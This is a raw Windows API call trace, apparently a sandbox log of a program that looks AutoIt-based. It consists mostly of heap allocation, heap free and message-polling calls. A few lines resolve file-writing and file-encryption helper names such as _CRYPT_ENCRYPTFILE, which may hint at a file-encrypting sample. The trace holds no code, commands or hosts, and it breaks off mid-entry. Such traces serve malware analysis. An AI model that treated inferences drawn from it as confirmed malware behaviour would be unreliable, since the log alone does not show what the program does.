[0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9538 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9550 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5e18 [0155.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9550 | out: hHeap=0x8a0000) returned 1 [0155.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e18 | out: hHeap=0x8a0000) returned 1 [0155.047] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa170 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9550 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5e18 [0155.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9550 | out: hHeap=0x8a0000) returned 1 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8daef8 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9550 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9568 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5e28 [0155.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9568 | out: hHeap=0x8a0000) returned 1 [0155.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e28 | out: hHeap=0x8a0000) returned 1 [0155.047] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa198 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9568 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5e28 [0155.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9568 | out: hHeap=0x8a0000) returned 1 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9befc8 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9568 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9580 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5e38 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9580 | out: hHeap=0x8a0000) returned 1 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e38 | out: hHeap=0x8a0000) returned 1 [0155.048] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa1c0 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9580 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5e38 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9580 | out: hHeap=0x8a0000) returned 1 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9236b0 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9580 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9598 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5e48 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9598 | out: hHeap=0x8a0000) returned 1 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e48 | out: hHeap=0x8a0000) returned 1 [0155.048] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa1e8 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9598 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5e48 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9598 | out: hHeap=0x8a0000) returned 1 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8daf40 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9598 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b95b0 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5e58 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95b0 | out: hHeap=0x8a0000) returned 1 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e58 | out: hHeap=0x8a0000) returned 1 [0155.048] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa210 [0155.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b95b0 [0155.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95b0 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95c8 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e88 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e78 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95c8 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa238 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e68 | out: hHeap=0x8a0000) returned 1 [0155.049] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95c8 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95e0 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e78 | out: hHeap=0x8a0000) returned 1 [0155.049] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95e0 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95f8 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e88 | out: hHeap=0x8a0000) returned 1 [0155.049] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b95f8 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9610 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e98 | out: hHeap=0x8a0000) returned 1 [0155.049] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9628 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9640 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ea8 | out: hHeap=0x8a0000) returned 1 [0155.049] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9640 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9658 | out: hHeap=0x8a0000) returned 1 [0155.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5eb8 | out: hHeap=0x8a0000) returned 1 [0155.050] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.050] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf0a8 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5eb8 | out: hHeap=0x8a0000) returned 1 [0155.050] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.050] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf0a8 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5eb8 | out: hHeap=0x8a0000) returned 1 [0155.050] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.050] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa350 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5eb8 | out: hHeap=0x8a0000) returned 1 [0155.050] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.050] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf0a8 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5eb8 | out: hHeap=0x8a0000) returned 1 [0155.050] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9658 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9670 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ec8 | out: hHeap=0x8a0000) returned 1 [0155.050] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9670 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9688 | out: hHeap=0x8a0000) returned 1 [0155.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ed8 | out: hHeap=0x8a0000) returned 1 [0155.050] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9688 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96a0 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ee8 | out: hHeap=0x8a0000) returned 1 [0155.051] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96a0 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96b8 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ef8 | out: hHeap=0x8a0000) returned 1 [0155.051] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96b8 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96d0 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5f08 | out: hHeap=0x8a0000) returned 1 [0155.051] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96d0 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96e8 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5f18 | out: hHeap=0x8a0000) returned 1 [0155.051] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b96e8 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9700 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5f28 | out: hHeap=0x8a0000) returned 1 [0155.051] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9700 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9718 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5f38 | out: hHeap=0x8a0000) returned 1 [0155.051] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9718 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9730 | out: hHeap=0x8a0000) returned 1 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5f48 | out: hHeap=0x8a0000) returned 1 [0155.051] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9730 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9748 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1570 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9748 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9760 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1580 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9760 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9778 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1590 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9778 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9790 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e15a0 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9790 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97a8 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e15b0 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97a8 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97c0 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e15c0 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97c0 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97d8 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e15d0 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97d8 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97f0 | out: hHeap=0x8a0000) returned 1 [0155.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e15e0 | out: hHeap=0x8a0000) returned 1 [0155.052] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b97f0 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9808 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e15f0 | out: hHeap=0x8a0000) returned 1 [0155.053] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9808 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9820 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1600 | out: hHeap=0x8a0000) returned 1 [0155.053] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9820 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9838 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1610 | out: hHeap=0x8a0000) returned 1 [0155.053] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9868 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1620 | out: hHeap=0x8a0000) returned 1 [0155.053] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9868 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9880 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1630 | out: hHeap=0x8a0000) returned 1 [0155.053] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9880 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9898 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1640 | out: hHeap=0x8a0000) returned 1 [0155.053] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9898 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b98b0 | out: hHeap=0x8a0000) returned 1 [0155.053] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1650 | out: hHeap=0x8a0000) returned 1 [0155.053] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b98e0 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1670 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b98f8 | out: hHeap=0x8a0000) returned 1 [0155.054] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf150 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.054] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf150 | out: hHeap=0x8a0000) returned 1 [0155.054] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1680 | out: hHeap=0x8a0000) returned 1 [0155.054] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.054] CharUpperBuffW (in: 